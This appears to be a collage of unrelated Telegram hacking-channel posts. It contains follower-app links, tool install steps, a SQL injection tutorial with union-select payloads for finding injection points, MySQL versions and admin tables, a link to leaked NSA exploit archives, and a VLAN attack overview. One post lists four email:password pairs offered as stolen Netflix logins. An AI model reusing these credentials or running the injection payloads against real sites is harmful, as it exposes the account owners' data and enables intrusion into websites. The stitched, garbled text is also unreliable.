🦑Configuration example of proxy server and router full 6 parts

🦑PREMIUM PROXIES FROM 1 H

pastebin.com/fMDGUJUZ

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑top rated Apps to Get Followers on TikTok
t.me/UndercodeTesting

https://tokupgrade.com/

https://toksocial.com/

http://social-viral.net/

http://mediamister.net/

http://followersup.net/

https://play.google.com/store/apps/details?id=com.tiktokvideos.hotfunnyvideos&hl=en

https://freetiktok.com/

https://m.apkpure.com/followers-for-tiktok/us.TikTok.Followers.Likes.Fans

https://apkpure.com/free-tik-tok-followers/com.freefans.freefollower


@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SPEED UP YOUR HOST BY NSA - ⭐️
> DataWave is an ingest/query framework that leverages Apache Accumulo to provide fast, secure data access.
twitter.com/UndercodenEWS


🦑FEATURES :

> Data fusion across structured and unstructured datasets

> Construction and analysis of distributed graphs

> Multi-tenant data architectures, with tenants having distinct security requirements and data access patterns

> Fine-grained control over data access, integrated easily with existing user-authorization services and PKI

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) clone https://github.com/NationalSecurityAgency/datawave.git

2) echo "source DW_SOURCE/contrib/datawave-quickstart/bin/env.sh" >> ~/.bashrc # Step 1
$ source ~/.bashrc # Step 2
$ allInstall # Step 3
$ datawaveWebStart && datawaveWebTest # Step 4
# Setup is now complete

3) The four commands above will complete the entire quickstart installation. However, it’s a good idea to at least skim over the sections below to get an idea of how the setup works and how to customize it for your own preferences.

4) To keep things simple, DataWave, Hadoop, Accumulo, ZooKeeper, and Wildfly will be installed under your DW_SOURCE/contrib/datawave-quickstart directory, and all will be owned by / executed as the current user.

🦑Important: If you currently have any of the above installed locally under any user account, you should ensure that all are stopped/disabled before proceeding
1: Update ~/.bashrc
2: Bootstrap the Environment
3: Install Services
4: Start Wildfly & Run Tests
Step 1: Update ~/.bashrc
1.1 Add the Quickstart Environment
This step ensures that your DataWave environment and all its services will remain configured correctly across bash sessions.

5) $ echo "source DW_SOURCE/contrib/datawave-quickstart/bin/env.sh" >> ~/.bashrc # Step
The env.sh script is a wrapper that bootstraps each service in turn by sourcing its respective {servicename}/boostrap.sh script. These scripts define supporting bash variables and functions, encapsulating configuration and functionality consistently for all services.

🦑 Override Default Binaries
1) To override the quickstart’s default version of a particular binary, simply override the desired DW_*_DIST_URI value as shown below. URIs may be local or remote. Local file URI values must be prefixed with file://

$ vi ~/.bashrc
...

> export DW_HADOOP_DIST_URI=file:///my/local/binaries/hadoop-x.y.z.tar.gz

> export DW_ACCUMULO_DIST_URI=http://some.apache.mirror/accumulo/1.x/accumulo-1.x-bin.tar.gz

> export DW_ZOOKEEPER_DIST_URI=http://some.apache.mirror/zookeeper/x.y/zookeeper-x.y.z.tar.gz

> export DW_WILDFLY_DIST_URI=file:///my/local/binaries/wildfly-10.x.tar.gz

> export DW_MAVEN_DIST_URI=file:///my/local/binaries/apache-maven-x.y.z.tar.gz

5) source DW_SOURCE/contrib/datawave-quickstart/bin/env.sh

# If building the quickstart docker image, you only need the exports, no need to source env.sh

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Many fakes & forks vault 7 cia tools this the official one :

https://github.com/xiaoyanguoke/CIAHackingTools

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑important if you have website:


A) Determine if there is an injection point

This is very simple. The most common thing we see is the format of the page: index.php? Id = 2. We know that PHP is often used with the MYSQL database. There must be a table in the MYSQL database, such as setting_table When we submit the above address, the program generally handles it like this:

1.Use GET or POST to get the id = 1 we submitted and pass this value to a variable id.

2. Query: select * from setting_table where id = $ id

The above statement is the query statement, we substitute $ id = 1 is:

select * from setting_table where id = 1

🦑There is no problem with this statement, the information with id 1 will be taken out and displayed to us, so we can see the normal page.

See how we judge:

1. We submit id = 1 and 1 = 1

Let's see what this effect is. The $ id here is 1 and 1 = 1. Let's see what it looks like:

select * from setting_table where id = 1 and 1 = 1

This statement adds an and statement, followed by 1 = 1 is definitely true, so it does not affect the establishment of the above statement, it will also take out the information of id = 1 to display to us, so we see the original normal page.

2. We submit id = 1 and 1 = 2

Take a look at what this effect is. The $ id here is 1 and 1 = 2.

select * from setting_table where id = 1 and 1 = 2

Analyzing this statement, the previous is still the same, except that at the end, and 1 = 2, this is naturally not true! And because it is connected with and, so naturally can not find the conditions! It can only echo us back to an error Or blank page pull ~ !!

The above is the basic reason that we generally use and 1 = 1 & and 1 = 2 to judge, but here we should pay attention to a few points, as follows:

1. When the program is processed, it must be where id = $ id instead of where id = $ id, this single quote is very different, how is it different, I will talk about it later.

2. The program did not process the parameters we submitted or did not handle them well, which led us to submit directly. If the program has more parameters we submitted for processing, it will be different, and it will be later!

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑important if you have website 2 :

Quickly determine the MYSQL version

Premise: You get an injection point, for example: news.php? Id = 1

This point is what you found. Submitting and 1 = 1 and and 1 = 2 are different.

We can guess the version of MYSQL like this. . Proceed as follows:

1. Submit /news.php?id=1/*!40000%20s*/ If it returns to normal, it means that the MYSQL version is below the 4000 version, you can adjust the highest digit in turn, for example, I changed to 39000, if it is normal , Submit 38000 ... until the error message is returned, the last fixed one is the MYSQL version.

The following is the process when I submit the test (only write MYSQL version)

40000 (+)-39000 (+)-38000 (+)-370000 (-)-37900 (+)-37800 (+)-37700 (-)-End !!

The MYSQL version is 37700.

2. In general, we do n’t guess the specific version. We only care whether MYSQL is above 4.0. I think that only MYSQL above 4.0 supports UNION query. The following is not supported, so we often only use / *! 40000% 20s * / See if it is version 4.0 or higher.

PS: / *! 40000% 20s * / here /*!......*/ is a special way of commenting in mysql, there is nothing strange, remember how to use it ~

Lecture 3: How to get the table name by PHP injection.

Ready to write, see someone asked, sum it up, let's count to the third lecture!

Quote:
Originally posted by spirit at 2006-5-16 05:57 PM:

I read a lot of articles ... the eyes are all spent

The things involved are more comprehensive

But I still don't know how to make a table

You can't go directly to the field .. ??

Come one by one

Database table field values ...

I think this logic is correct ...

By the way, I still feel ...

The table is really not easy to do, unlike ASP may be directly exposed, PHP is still not available, we generally have two methods:

1. Guess by experience: For example, admin, user, news, vote, wenzhang, guanliyuan, etc., which are commonly used by everyone, there is no way.

2. Exploit code view: Use Load_file to explode the file code, you can see what table and what field the data is interpolated into, this is very clear, but load_file is also very skillful. . I'll talk about it later.

🦑To be specific:

1. There is nothing to say about this, just guess directly. For example, if you see an injection point, similar to news.php? Id = 1, you can get specific fields by union query, such as: news.php? Id = 1 and 1 = 2 union select 1,2,3,4 is established,

You can guess this: news.php? Id = 1 and 1 = 2 union select 1,2,3,4 from admin / * If there is an admin table, it will return true, otherwise there will be no table admin, other and this the same.

2. This is a bit ultimate. For example, if you get his absolute path, you can load_file (file path) the code of the file. For example, if you violently log in to the administrator's login page, you can see the SQL statement in him Which table did he take the value from, right? "

The principle is like this, think a lot, what you have learned, I hope to share.

🦑 The difference between quotation marks

Many friends do not understand the role of that quote, and think that adding quotes is the same as not adding.

The quotation marks (including single and double) have a great influence on our injection. Here is mainly related to the state of magic. When the magic is off, it has no effect. When the magic is on, it is very different Too. .

Tips: When magic is on, it is the single quote ('), double quote ("), (\), space (), etc. that are automatically submitted for us, plus the escape symbol \, so that the upper ones become (\' ), (\ ”), (\\), etc., this is too troublesome for us to inject, examples are as follows.

1. The first example (without quotes)

If the statement is as follows:

QUOTE:
select * from news where newsid = $ id

1. The situation when magic is off

When it is off, the data information submitted by us will not be processed, assuming that an SQL statement is like this;

We can submit the value of $ id in the URL, as we said before to give $ id:

$ id = 1 union select 1,2,3,4 from admin

You can basically get the data we want.

2. The situation when magic is on

There is no difference at this time because we did not submit sensitive characters

Second, the second example looks at the SQL statement it processes:

QUOTE:
select * from news where newsid = $ id


At this time, to successfully use the unfiltered parameter $ id, we can submit as follows:

$ id = 1 'union select 1,2,3,4 from admin / *

There must be a () to close the front, and then add a / * to comment out the back

1. The situation when magic is off

If magic is off, we can submit it directly and use it successfully

2. The situation when magic is on

If magic is on, then the statement we submitted becomes:

$ id = 1 \ 'union select 1,2,3,4 from admin / *

Look, there is no way to use it (although there are loopholes)


WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 FOLLOW THIS GUIDE IF YOU HAVE WEBSITE !

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 instagram topic
> Free Instagram scripts, bots and Python API wrapper. Get free instagram followers with our auto like, auto follow and other scripts!
t.me/UndercodeTesting

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/instagrambot/instabot.git

2) cd instabot

3) pip install -U instabot


🦑You will NOT run the code provided in this repo

> You will NOT use this API for marketing purposes (spam, botting, harassment, massive bulk messaging...).

> We do NOT give support to anyone who wants to use this API to send spam or commit other crimes.

✅ verified by under code as topic insta bot tools

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 twitter followers& Tools apps :

https://itunes.apple.com/us/app/crowdfire-for-twitter-instagram/id528626975?mt=8

https://itunes.apple.com/us/app/followers-for-instagram-get/id597077652?mt=8

https://mytoptweet.com/

http://www.socialbro.com/

http://crowdriff.com/riffle/

http://www.twitonomy.com/

https://klout.com/#/overview

http://bluenod.com/

http://twchat.com/

http://www.swayy.co/#content

http://blog.digg.com/post/91454524841/digg-deeper

http://twurly.org/

https://unfollowers.com/

http://doesfollow.com/

»»»»choosed the popular one for more https://buffer.com/library/free-twitter-tools

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems
t.me/UndercodeTesting

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Clone or download the project files (no compilation nor installation is required) ;

git clone https://github.com/CISOfy/lynis
Execute:

2) cd lynis; ./lynis audit system

> If you want to run the software as root, we suggest changing the ownership of the files. Use chown -R 0:0 to recursively alter the owner and group and set it to user ID 0 (root).

🦑FEATURES :

System administrators
Auditors
Security officers
Penetration testers
Security professionals
Automated security auditing
Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
Vulnerability detection

✅VERIFIED

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 NETFLIX PREM AFTER LOGIN SEND SC

semhartekle53@gmail.com:mskdwx12
nadams@winterscott.co.uk:qwdsdw
jeanphi.pernin@orange.fr:ac;lmsci8a12
justinepalacio95@gmail.com:nsdavil12

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to check if the website if vulnerable of clickjacking
> and create a poc-termux-linux
t.me/UndercodeTesting

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/D4Vinci/Clickjacking-Tester.git

2) cd Clickjacking-Tester

3) python(3) clickjacking_tester.py <file_name>

4) Example
Input

> python clickjacking_tester.py sites.txt
sites.txt
www.google.com
www.turkhackteam.com

5) Output
[*] Checking www.google.com

[-] Website is not vulnerable!

[*] Checking www.turkhackteam.org

[+] Website is vulnerable!
[*] Created a poc and saved to <URL>.html

✅ verified
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑nsa leak tool
> Decrypted content of odd.tar.xz.gpg, swift.tar.xz.gpg and windows.tar.xz.gpg
t.me/UndercodeTesting

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :

🦑sha256 hashes

> Original archives
7c19a67d728bc700d18d2ed389a80de495681b7097222d9b8f1d696f0986f9a2 odd.tar.xz.gpg
78b89b2c4b129400150c7b60a426ff469aaea31da1588d2abc4180feaa9c41d3 swift.tar.xz.gpg
c28d5c10ec78bc66d3868e4862c7f801ffd561e2116b529e0782bf78f3ef3255 windows.tar.xz.gpg


>Decrypted archives
85e03866ae7eaaedd9462054b62a10f2180983bdfd086b29631173ae4422f524 odd.tar.xz
df468f01e65f3f1bc18f844d7f7bac8f8eec3664a131e2fb67ae3a55f8523004 swift.tar.xz
5bb9ddfbcefb75d017a9e745b83729390617b16f4079356579ef00e5e6b5fbd0 windows.tar.xz

🦑1) DOWNLOAD : https://github.com/x0rz/EQGRP_Lost_in_Translationhttps://github.com/x0rz/EQGRP_Lost_in_Translation


> 3 folders :

Windows: contains Windows exploits, implants and payloads

swift: contains operational notes from banking attacks

oddjob: docs related to the ODDJOB backdoor

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Comprehensive analysis of VLAN attacks


1) The VLAN attack method is an attack method adopted by hackers based on the application of VLAN technology. In the face of these tricky refurbished attack methods, how to take effective preventive measures? In this article, we will introduce the hacker's attack methods and methods for networks managed by VLAN technology We can take defensive measures.


🦑 The common VLAN attacks are as follows:

1) VLAN attack 1.802.1Q and ISL tag attack

A tag attack is a malicious attack. With it, users on one VLAN can illegally access another VLAN. For example, if the switch port is configured as DTP (DYNAMIC TRUNK PROTCOL) auto to receive fake DTP (DYNAMIC TRUNK PROTCOL) packets, it will become a trunk port and may receive traffic to any VLAN. Thus, malicious users can communicate with other VLANs through the controlled ports. Sometimes even if only receiving ordinary packets, the switch port may violate its original intention and operate like an all-round trunk port (for example, receiving packets from other VLANs than the local one). This phenomenon is often called "VLAN leakage."

> For this kind of attack, simply set the DTP (DYNAMIC TRUNK PROTCOL) on all untrusted ports (not meeting the trust condition) to "Off" to prevent this kind of attack. The software and hardware running on the Cisco Catalyst 2950, ​​Catalyst 3550, Catalyst 4000, and Catalyst 6000 series switches can also implement proper traffic classification and isolation on all ports.

2) VLAN attack 2. Double encapsulation 802.1Q / nested VLAN attack

Inside the switch, VLAN numbers and identifications are expressed in a special extended format, the purpose is to keep the forwarding path independent of the end-to-end VLAN without losing any information. Outside the switch, the marking rules are specified by standards such as ISL or 802.1Q.

> ISL belongs to Cisco's proprietary technology and is a compact form of the extended packet header used in the device. Each packet always gets a mark, and there is no risk of logo loss, which can improve security.

> On the other hand, the IEEE committee that developed 802.1Q decided that for backward compatibility, it is best to support intrinsic VLANs, that is, VLANs that are not explicitly related to any tags on the 802.1Q link. This VLAN is used implicitly to receive all untagged traffic on the 802.1Q port.

> This feature is what users want, because with this feature, the 802.1Q port can directly talk to the old 802.3 port by sending and receiving unmarked traffic. However, in all other cases, this feature can be very harmful, because when transmitted over an 802.1Q link, packets associated with the native VLAN will lose their tags, such as their class of service (802.1p bits).

2) Stripped first, then sent back to the attacker 802.1q frame, VLAN A, VLAN B data contains the trunk VLAN B data of the native VLAN A

Note: Only if the trunk's native VLAN is the same as the attacker's, will it take effect.

3) When double-encapsulated 802.1Q packets happen to enter the network from devices with the same VLAN as the eigen VLAN of the trunk, the VLAN IDs of these packets will not be retained end-to-end, because the 802.1Q trunk will always modify the packet, that is, strip off its outside mark. After removing the external tag, the internal tag will become the unique VLAN identifier of the packet. Therefore, if the packet is double-encapsulated with two different tags, the traffic can jump between different VLANs.

5) This situation will be regarded as a misconfiguration, because the 802.1Q standard does not force users to use the native VLAN in these situations. In fact, the proper configuration that should always be used is to clear the native VLAN from all 802.1Q trunks (setting it to 802.1q-all-tagged mode can achieve the exact same effect). When the local VLAN cannot be cleared, the unused VLAN should be selected as the local VLAN of all trunk roads, and the VLAN cannot be used for any other purpose. Protocols such as STP, DTP (DYNAMIC TRUNK PROTCOL) and UDLD should be the only legal users of the local VLAN, and their traffic should be completely isolated from all data packets.

6) VLAN attack 3. VLAN hopping attack

Virtual local area network (VLAN) is a method of segmenting the broadcast domain. VLANs are also often used to provide additional security for the network because computers on one VLAN cannot talk to users on another VLAN without explicit access. However, VLAN itself is not enough to protect the security of the environment. Malicious hackers can jump from one VLAN to another even if they are not authorized.

7) VLAN hopping (VLAN hopping) relies on the dynamic relay protocol (DTP (DYNAMIC TRUNK PROTCOL)). If there are two interconnected switches, DTP (DYNAMIC TRUNK PROTCOL) can negotiate the two to determine whether they will become 802.1Q trunks. The negotiation process is done by checking the configuration status of the port.

8) The VLAN hopping attack makes full use of DTP (DYNAMIC TRUNK PROTCOL). In the VLAN hopping attack, a hacker can deceive the computer and impersonate another switch to send a fake DTP (DYNAMIC TRUNK PROTCOL) negotiation message, announcing that it wants to become a relay; the real one After receiving this DTP (DYNAMIC TRUNK PROTCOL) message, the switch thought that it should enable the 802.1Q relay function, and once the relay function was enabled, the information flow through all VLANs would be sent to the hacker's computer.

10) After the relay is established, the hacker can continue to detect the information flow, or it can specify the VLAN to which the attack traffic is sent by adding 802.1Q information to the frame.

11) VLAN attack 4. VTP attack

VLAN Trunk Protocol (VTP, VLAN Trunk Protocol) is a management protocol that can reduce the number of configurations in the switching environment. As far as VTP is concerned, the switch can be a VTP server, a VTP client, or a VTP transparent switch. Here we focus on the VTP server and the VTP client. Every time the user changes the configuration of the switch working in the VTP server mode, the VTP configuration version number will increase by 1 whether the VLAN is added, modified or removed. After the VTP client sees that the configuration version number is greater than the current version number, It will automatically synchronize with the VTP server.

12) A malicious hacker can use VTP for his own purposes and remove all VLANs on the network (except the default VLAN), so that he can enter the same VLAN where every other user is. However, the user may still be on a different network segment, so a malicious hacker needs to change his IP address to enter the same network segment as the host he wants to attack.

A malicious hacker can make full use of VTP by connecting to the switch and establishing a relay between his computer and the switch. A hacker can send a VTP message to the VTP server whose configuration version number is higher than the current one. This will cause all switches to synchronize with the malicious hacker's computer, thereby removing all non-default VLANs from the VLAN database.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Comprehensive analysis of VLAN attacks full